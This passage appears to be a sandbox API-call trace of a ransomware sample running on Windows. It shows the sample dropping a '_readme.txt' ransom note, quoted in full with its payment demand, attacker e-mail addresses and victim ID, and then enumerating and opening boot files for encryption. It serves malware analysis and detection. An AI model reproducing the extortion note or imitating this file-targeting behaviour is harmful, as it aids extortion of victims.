Size=0x850) returned 0x2ac3dd0 [0183.829] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2ac3dd0 | out: hHeap=0x2c0000) returned 1 [0183.830] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2ad7950 | out: hHeap=0x2c0000) returned 1 [0183.830] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x20) returned 0x2ad7950 [0183.830] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x820) returned 0x2ac3dd0 [0183.830] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2ac3dd0 | out: hHeap=0x2c0000) returned 1 [0183.830] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2ad7950 | out: hHeap=0x2c0000) returned 1 [0183.830] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x20) returned 0x2ad7950 [0183.830] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x820) returned 0x2ac3dd0 [0183.831] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2ac3dd0 | out: hHeap=0x2c0000) returned 1 [0183.831] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2ad7950 | out: hHeap=0x2c0000) returned 1 [0183.831] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x20) returned 0x2ad7950 [0183.831] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x830) returned 0x2ac3dd0 [0183.831] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0xc46) returned 0x2ade6e0 [0183.832] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2ac3dd0 | out: hHeap=0x2c0000) returned 1 [0183.833] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2ade6e0 | out: hHeap=0x2c0000) returned 1 [0183.833] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2ad7950 | out: hHeap=0x2c0000) returned 1 [0183.833] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x20) returned 0x2ad7950 [0183.833] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x840) returned 0x2ac3dd0 [0183.834] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2ac3dd0 | out: hHeap=0x2c0000) returned 1 [0183.834] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2ad7950 | out: hHeap=0x2c0000) returned 1 [0183.834] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x20) returned 0x2ad7950 [0183.834] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x840) returned 0x2ac3dd0 [0183.835] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2ac3dd0 | out: hHeap=0x2c0000) returned 1 [0183.835] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2ad7950 | out: hHeap=0x2c0000) returned 1 [0183.835] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x20) returned 0x2ad7950 [0183.835] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x830) returned 0x2ac3dd0 [0183.836] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2ac3dd0 | out: hHeap=0x2c0000) returned 1 [0183.836] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2ad7950 | out: hHeap=0x2c0000) returned 1 [0183.836] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x20) returned 0x2ad7950 [0183.836] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x830) returned 0x2ac3dd0 [0183.836] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2ac3dd0 | out: hHeap=0x2c0000) returned 1 [0183.837] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2ad7950 | out: hHeap=0x2c0000) returned 1 [0183.837] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x20) returned 0x2ad7950 [0183.837] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x830) returned 0x2ac3dd0 [0183.837] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2ac3dd0 | out: hHeap=0x2c0000) returned 1 [0183.837] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2ad7950 | out: hHeap=0x2c0000) returned 1 [0183.837] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x20) returned 0x2ad7950 [0183.837] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x820) returned 0x2ac3dd0 [0183.838] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2ac3dd0 | out: hHeap=0x2c0000) returned 1 [0183.838] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2ad7950 | out: hHeap=0x2c0000) returned 1 [0183.838] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x20) returned 0x2ad7950 [0183.838] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x820) returned 0x2ac3dd0 [0183.838] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2ac3dd0 | out: hHeap=0x2c0000) returned 1 [0183.838] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2ad7950 | out: hHeap=0x2c0000) returned 1 [0183.838] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x20) returned 0x2ad7950 [0183.838] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x820) returned 0x2ac3dd0 [0183.839] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2ac3dd0 | out: hHeap=0x2c0000) returned 1 [0183.839] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2ad7950 | out: hHeap=0x2c0000) returned 1 [0183.839] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x20) returned 0x2ad7950 [0183.839] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x830) returned 0x2ac3dd0 [0183.839] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2ac3dd0 | out: hHeap=0x2c0000) returned 1 [0183.840] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2ad7950 | out: hHeap=0x2c0000) returned 1 [0183.840] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x20) returned 0x2ad7950 [0183.840] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x830) returned 0x2ac3dd0 [0183.840] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0xc46) returned 0x2ade6e0 [0183.840] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2ac3dd0 | out: hHeap=0x2c0000) returned 1 [0183.840] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2ade6e0 | out: hHeap=0x2c0000) returned 1 [0183.840] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2ad7950 | out: hHeap=0x2c0000) returned 1 [0183.840] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x20) returned 0x2ad7950 [0183.840] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x820) returned 0x2ac3dd0 [0183.841] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2ac3dd0 | out: hHeap=0x2c0000) returned 1 [0183.841] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2ad7950 | out: hHeap=0x2c0000) returned 1 [0183.841] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x20) returned 0x2ad7950 [0183.841] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x850) returned 0x2ac3dd0 [0183.841] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2ac3dd0 | out: hHeap=0x2c0000) returned 1 [0183.842] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2ad7950 | out: hHeap=0x2c0000) returned 1 [0183.842] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x20) returned 0x2ad7950 [0183.842] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x850) returned 0x2ac3dd0 [0183.842] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2ac3dd0 | out: hHeap=0x2c0000) returned 1 [0183.843] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2ad7950 | out: hHeap=0x2c0000) returned 1 [0183.843] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x20) returned 0x2ad7950 [0183.843] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x820) returned 0x2ac3dd0 [0183.843] PathFindFileNameW (pszPath="C:\\Boot\\it-IT\\") returned="it-IT\\" [0183.843] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x20) returned 0x2ad7ea0 [0183.843] PathFindFileNameW (pszPath="C:\\Boot\\") returned="Boot\\" [0183.843] PathFindFileNameW (pszPath="C:\\") returned="C:\\" [0183.843] PathFindFileNameW (pszPath="") returned="" [0183.843] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x20) returned 0x2ad7ea0 [0183.843] LoadLibraryW (lpLibFileName="Shell32.dll") returned 0x759a0000 [0183.844] GetProcAddress (hModule=0x759a0000, lpProcName="SHGetFolderPathW") returned 0x75a25708 [0183.844] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x800) returned 0x2ade6e0 [0183.844] SHGetFolderPathW (in: hwnd=0x0, csidl=40, hToken=0x0, dwFlags=0x0, pszPath=0x2ade6e0 | out: pszPath="C:\\Users\\kEecfMwgj") returned 0x0 [0183.844] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x810) returned 0x2ac3dd0 [0183.844] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x20) returned 0x2ad7950 [0183.844] FreeLibrary (hLibModule=0x759a0000) returned 1 [0183.844] PathAppendW (in: pszPath="C:\\Boot\\it-IT\\", pMore="_readme.txt" | out: pszPath="C:\\Boot\\it-IT\\_readme.txt") returned 1 [0183.844] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x820) returned 0x2ac4ee0 [0183.844] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2ad7e78 | out: hHeap=0x2c0000) returned 1 [0183.844] PathFileExistsW (pszPath="C:\\Boot\\it-IT\\_readme.txt") returned 0 [0183.844] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x7d00) returned 0x2ae3ea0 [0183.844] lstrcpyW (in: lpString1=0x2ae3ea0, lpString2="ATTENTION!\r\n\r\nDon't worry, you can return all your files!\r\nAll your files like pictures, databases, documents and other important are encrypted with strongest encryption and unique key.\r\nThe only method of recovering files is to purchase decrypt tool and unique key for you.\r\nThis software will decrypt all your encrypted files.\r\nWhat guarantees you have?\r\nYou can send one of your encrypted file from your PC and we decrypt it for free.\r\nBut we can decrypt only 1 file for free. File must not contain valuable information.\r\nYou can get and look video overview decrypt tool:\r\nhttps://we.tl/t-QsoSRIeAK6\r\nPrice of private key and decrypt software is $980.\r\nDiscount 50% available if you contact us first 72 hours, that's price for you is $490.\r\nPlease note that you'll never restore your data without payment.\r\nCheck your e-mail \"Spam\" or \"Junk\" folder if you don't get answer more than 6 hours.\r\n\r\n\r\nTo get this software you need write on our e-mail:\r\nsupport@bestyourmail.ch\r\n\r\nReserve e-mail address to contact us:\r\ndatarestorehelp@airmail.cc\r\n\r\nYour personal ID:\r\n0531Jhyjd" | out: lpString1="ATTENTION!\r\n\r\nDon't worry, you can return all your files!\r\nAll your files like pictures, databases, documents and other important are encrypted with strongest encryption and unique key.\r\nThe only method of recovering files is to purchase decrypt tool and unique key for you.\r\nThis software will decrypt all your encrypted files.\r\nWhat guarantees you have?\r\nYou can send one of your encrypted file from your PC and we decrypt it for free.\r\nBut we can decrypt only 1 file for free. File must not contain valuable information.\r\nYou can get and look video overview decrypt tool:\r\nhttps://we.tl/t-QsoSRIeAK6\r\nPrice of private key and decrypt software is $980.\r\nDiscount 50% available if you contact us first 72 hours, that's price for you is $490.\r\nPlease note that you'll never restore your data without payment.\r\nCheck your e-mail \"Spam\" or \"Junk\" folder if you don't get answer more than 6 hours.\r\n\r\n\r\nTo get this software you need write on our e-mail:\r\nsupport@bestyourmail.ch\r\n\r\nReserve e-mail address to contact us:\r\ndatarestorehelp@airmail.cc\r\n\r\nYour personal ID:\r\n0531Jhyjd") returned="ATTENTION!\r\n\r\nDon't worry, you can return all your files!\r\nAll your files like pictures, databases, documents and other important are encrypted with strongest encryption and unique key.\r\nThe only method of recovering files is to purchase decrypt tool and unique key for you.\r\nThis software will decrypt all your encrypted files.\r\nWhat guarantees you have?\r\nYou can send one of your encrypted file from your PC and we decrypt it for free.\r\nBut we can decrypt only 1 file for free. File must not contain valuable information.\r\nYou can get and look video overview decrypt tool:\r\nhttps://we.tl/t-QsoSRIeAK6\r\nPrice of private key and decrypt software is $980.\r\nDiscount 50% available if you contact us first 72 hours, that's price for you is $490.\r\nPlease note that you'll never restore your data without payment.\r\nCheck your e-mail \"Spam\" or \"Junk\" folder if you don't get answer more than 6 hours.\r\n\r\n\r\nTo get this software you need write on our e-mail:\r\nsupport@bestyourmail.ch\r\n\r\nReserve e-mail address to contact us:\r\ndatarestorehelp@airmail.cc\r\n\r\nYour personal ID:\r\n0531Jhyjd" [0183.845] lstrcatW (in: lpString1="ATTENTION!\r\n\r\nDon't worry, you can return all your files!\r\nAll your files like pictures, databases, documents and other important are encrypted with strongest encryption and unique key.\r\nThe only method of recovering files is to purchase decrypt tool and unique key for you.\r\nThis software will decrypt all your encrypted files.\r\nWhat guarantees you have?\r\nYou can send one of your encrypted file from your PC and we decrypt it for free.\r\nBut we can decrypt only 1 file for free. File must not contain valuable information.\r\nYou can get and look video overview decrypt tool:\r\nhttps://we.tl/t-QsoSRIeAK6\r\nPrice of private key and decrypt software is $980.\r\nDiscount 50% available if you contact us first 72 hours, that's price for you is $490.\r\nPlease note that you'll never restore your data without payment.\r\nCheck your e-mail \"Spam\" or \"Junk\" folder if you don't get answer more than 6 hours.\r\n\r\n\r\nTo get this software you need write on our e-mail:\r\nsupport@bestyourmail.ch\r\n\r\nReserve e-mail address to contact us:\r\ndatarestorehelp@airmail.cc\r\n\r\nYour personal ID:\r\n0531Jhyjd", lpString2="uyKE3UuexCE2KAbQ1PTkFn73qJrKsQWCvyN1YHYt" | out: lpString1="ATTENTION!\r\n\r\nDon't worry, you can return all your files!\r\nAll your files like pictures, databases, documents and other important are encrypted with strongest encryption and unique key.\r\nThe only method of recovering files is to purchase decrypt tool and unique key for you.\r\nThis software will decrypt all your encrypted files.\r\nWhat guarantees you have?\r\nYou can send one of your encrypted file from your PC and we decrypt it for free.\r\nBut we can decrypt only 1 file for free. File must not contain valuable information.\r\nYou can get and look video overview decrypt tool:\r\nhttps://we.tl/t-QsoSRIeAK6\r\nPrice of private key and decrypt software is $980.\r\nDiscount 50% available if you contact us first 72 hours, that's price for you is $490.\r\nPlease note that you'll never restore your data without payment.\r\nCheck your e-mail \"Spam\" or \"Junk\" folder if you don't get answer more than 6 hours.\r\n\r\n\r\nTo get this software you need write on our e-mail:\r\nsupport@bestyourmail.ch\r\n\r\nReserve e-mail address to contact us:\r\ndatarestorehelp@airmail.cc\r\n\r\nYour personal ID:\r\n0531JhyjduyKE3UuexCE2KAbQ1PTkFn73qJrKsQWCvyN1YHYt") returned="ATTENTION!\r\n\r\nDon't worry, you can return all your files!\r\nAll your files like pictures, databases, documents and other important are encrypted with strongest encryption and unique key.\r\nThe only method of recovering files is to purchase decrypt tool and unique key for you.\r\nThis software will decrypt all your encrypted files.\r\nWhat guarantees you have?\r\nYou can send one of your encrypted file from your PC and we decrypt it for free.\r\nBut we can decrypt only 1 file for free. File must not contain valuable information.\r\nYou can get and look video overview decrypt tool:\r\nhttps://we.tl/t-QsoSRIeAK6\r\nPrice of private key and decrypt software is $980.\r\nDiscount 50% available if you contact us first 72 hours, that's price for you is $490.\r\nPlease note that you'll never restore your data without payment.\r\nCheck your e-mail \"Spam\" or \"Junk\" folder if you don't get answer more than 6 hours.\r\n\r\n\r\nTo get this software you need write on our e-mail:\r\nsupport@bestyourmail.ch\r\n\r\nReserve e-mail address to contact us:\r\ndatarestorehelp@airmail.cc\r\n\r\nYour personal ID:\r\n0531JhyjduyKE3UuexCE2KAbQ1PTkFn73qJrKsQWCvyN1YHYt" [0183.845] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x820) returned 0x2ac5768 [0183.845] CreateFileW (lpFileName="C:\\Boot\\it-IT\\_readme.txt" (normalized: "c:\\boot\\it-it\\_readme.txt"), dwDesiredAccess=0x40000000, dwShareMode=0x2, lpSecurityAttributes=0x0, dwCreationDisposition=0x2, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0xffffffff [0183.845] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2ac5768 | out: hHeap=0x2c0000) returned 1 [0183.846] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2ae3ea0 | out: hHeap=0x2c0000) returned 1 [0183.846] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2ac3dd0 | out: hHeap=0x2c0000) returned 1 [0183.846] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x20) returned 0x2ad7e78 [0183.846] FindFirstFileW (in: lpFileName="C:\\Boot\\it-IT\\*" (normalized: "c:\\boot\\it-it\\*"), lpFindFileData=0x2f9fba4 | out: lpFindFileData=0x2f9fba4*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0x956aa140, ftCreationTime.dwHighDateTime=0x1d70554, ftLastAccessTime.dwLowDateTime=0x28daa640, ftLastAccessTime.dwHighDateTime=0x1d706aa, ftLastWriteTime.dwLowDateTime=0x28daa640, ftLastWriteTime.dwHighDateTime=0x1d706aa, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName=".", cAlternateFileName="")) returned 0x2a05da8 [0183.847] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2ad7e78 | out: hHeap=0x2c0000) returned 1 [0183.847] FindNextFileW (in: hFindFile=0x2a05da8, lpFindFileData=0x2f9fba4 | out: lpFindFileData=0x2f9fba4*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0x956aa140, ftCreationTime.dwHighDateTime=0x1d70554, ftLastAccessTime.dwLowDateTime=0x28daa640, ftLastAccessTime.dwHighDateTime=0x1d706aa, ftLastWriteTime.dwLowDateTime=0x28daa640, ftLastWriteTime.dwHighDateTime=0x1d706aa, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName="..", cAlternateFileName="")) returned 1 [0183.847] FindNextFileW (in: hFindFile=0x2a05da8, lpFindFileData=0x2f9fba4 | out: lpFindFileData=0x2f9fba4*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x956aa140, ftCreationTime.dwHighDateTime=0x1d70554, ftLastAccessTime.dwLowDateTime=0x28daa640, ftLastAccessTime.dwHighDateTime=0x1d706aa, ftLastWriteTime.dwLowDateTime=0xe9e80ea3, ftLastWriteTime.dwHighDateTime=0x1ca0420, nFileSizeHigh=0x0, nFileSizeLow=0x16250, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName="bootmgr.exe.mui", cAlternateFileName="BOOTMG~1.MUI")) returned 1 [0183.847] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x20) returned 0x2ad7e78 [0183.847] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x40) returned 0x2a05a20 [0183.847] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2ad7e78 | out: hHeap=0x2c0000) returned 1 [0183.847] PathFindExtensionW (pszPath="C:\\Boot\\it-IT\\bootmgr.exe.mui") returned=".mui" [0183.847] CreateFileW (lpFileName="C:\\Boot\\it-IT\\bootmgr.exe.mui" (normalized: "c:\\boot\\it-it\\bootmgr.exe.mui"), dwDesiredAccess=0xc0000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0xffffffff [0183.848] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2a05a20 | out: hHeap=0x2c0000) returned 1 [0183.848] FindNextFileW (in: hFindFile=0x2a05da8, lpFindFileData=0x2f9fba4 | out: lpFindFileData=0x2f9fba4*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x956aa140, ftCreationTime.dwHighDateTime=0x1d70554, ftLastAccessTime.dwLowDateTime=0x28daa640, ftLastAccessTime.dwHighDateTime=0x1d706aa, ftLastWriteTime.dwLowDateTime=0xe9e80ea3, ftLastWriteTime.dwHighDateTime=0x1ca0420, nFileSizeHigh=0x0, nFileSizeLow=0x16250, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName="bootmgr.exe.mui", cAlternateFileName="BOOTMG~1.MUI")) returned 0 [0183.848] FindClose (in: hFindFile=0x2a05da8 | out: hFindFile=0x2a05da8) returned 1 [0183.849] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2ac4ee0 | out: hHeap=0x2c0000) returned 1 [0183.849] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2ad7ef0 | out: hHeap=0x2c0000) returned 1 [0183.849] PeekMessageW (in: lpMsg=0x2f9ff08, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x2f9ff08) returned 0 [0183.849] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x20) returned 0x2ad7ef0 [0183.849] PeekMessageW (in: lpMsg=0x2f9fb74, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x2f9fb74) returned 0 [0183.849] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x20) returned 0x2ad7e78 [0183.849] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x820) returned 0x2ac4ee0 [0183.850] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2ac4ee0 | out: hHeap=0x2c0000) returned 1 [0183.850] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2ad7e78 | out: hHeap=0x2c0000) returned 1 [0183.850] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x20) returned 0x2ad7e78 [0183.850] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x830) returned 0x2ac4ee0 [0183.850] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2ac4ee0 | out: hHeap=0x2c0000) returned 1 [0183.851] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2ad7e78 | out: hHeap=0x2c0000) returned 1 [0183.851] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x20) returned 0x2ad7e78 [0183.851] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x830) returned 0x2ac4ee0 [0183.851] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2ac4ee0 | out: hHeap=0x2c0000) returned 1 [0183.851] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2ad7e78 | out: hHeap=0x2c0000) returned 1 [0183.851] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x20) returned 0x2ad7e78 [0183.851] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x830) returned 0x2ac4ee0 [0183.852] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2ac4ee0 | out: hHeap=0x2c0000) returned 1 [0183.852] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2ad7e78 | out: hHeap=0x2c0000) returned 1 [0183.852] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x20) returned 0x2ad7e78 [0183.852] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x830) returned 0x2ac4ee0 [0183.853] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2ac4ee0 | out: hHeap=0x2c0000) returned 1 [0183.853] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2ad7e78 | out: hHeap=0x2c0000) returned 1 [0183.853] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x20) returned 0x2ad7e78 [0183.853] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x840) returned 0x2ac4ee0 [0183.853] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2ac4ee0 | out: hHeap=0x2c0000) returned 1 [0183.854] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2ad7e78 | out: hHeap=0x2c0000) returned 1 [0183.854] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x20) returned 0x2ad7e78 [0183.854] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x820) returned 0x2ac4ee0 [0183.854] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0xc2e) returned 0x2ade6e0 [0183.854] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2ac4ee0 | out: hHeap=0x2c0000) returned 1 [0183.855] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2ade6e0 | out: hHeap=0x2c0000) returned 1 [0183.855] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2ad7e78 | out: hHeap=0x2c0000) returned 1 [0183.855] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x20) returned 0x2ad7e78 [0183.855] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x820) returned 0x2ac4ee0 [0183.856] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2ac4ee0 | out: hHeap=0x2c0000) returned 1 [0183.856] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2ad7e78 | out: hHeap=0x2c0000) returned 1 [0183.856] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x20) returned 0x2ad7e78 [0183.856] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x840) returned 0x2ac4ee0 [0183.856] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2ac4ee0 | out: hHeap=0x2c0000) returned 1 [0183.857] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2ad7e78 | out: hHeap=0x2c0000) returned 1 [0183.857] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x20) returned 0x2ad7e78 [0183.857] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x850) returned 0x2ac4ee0 [0183.857] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2ac4ee0 | out: hHeap=0x2c0000) returned 1 [0183.857] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2ad7e78 | out: hHeap=0x2c0000) returned 1 [0183.857] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x20) returned 0x2ad7e78 [0183.858] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x850) returned 0x2ac4ee0 [0183.858] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2ac4ee0 | out: hHeap=0x2c0000) returned 1 [0183.858] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2ad7e78 | out: hHeap=0x2c0000) returned 1 [0183.858] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x20) returned 0x2ad7e78 [0183.858] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x820) returned 0x2ac4ee0 [0183.859] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2ac4ee0 | out: hHeap=0x2c0000) returned 1 [0183.859] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2ad7e78 | out: hHeap=0x2c0000) returned 1 [0183.859] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x20) returned 0x2ad7e78 [0183.859] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x820) returned 0x2ac4ee0 [0183.859] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2ac4ee0 | out: hHeap=0x2c0000) returned 1 [0183.860] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2ad7e78 | out: hHeap=0x2c0000) returned 1 [0183.860] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x20) returned 0x2ad7e78 [0183.860] RtlAllocateHeap 